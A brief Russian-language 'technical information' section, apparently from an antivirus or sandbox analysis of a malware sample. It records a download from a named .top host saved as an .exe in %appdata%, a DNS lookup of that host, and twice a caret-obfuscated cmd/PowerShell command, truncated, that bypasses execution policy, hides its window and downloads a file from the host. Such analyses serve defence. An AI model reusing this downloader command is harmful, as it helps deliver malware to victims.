Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^We^r^sheL^L.e^xe -ex^eCuT^IO^N^PO^lI^c^Y B^Yp^AsS ^-^nOp^r^O^fiLe^ ^-WIN^DoW^ST^y^Le^ H^I^d^dEN (nEW-OBjECT ^sYste^M.NET.wEbClI^Ent^)^.do^wNlOADFil^e^('http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "pO^We^r^sheL^L.e^xe -ex^eCuT^IO^N^PO^lI^c^Y B^Yp^AsS ^-^nOp^r^O^fiLe^ ^-WIN^DoW^ST^y^Le^ H^I^d^dEN (nEW-OBjECT ^sYste^M.NET.wEbClI^Ent^)^.do^wNlOADFil^e^('http://www.zoerpoled....' (со скрытым окном)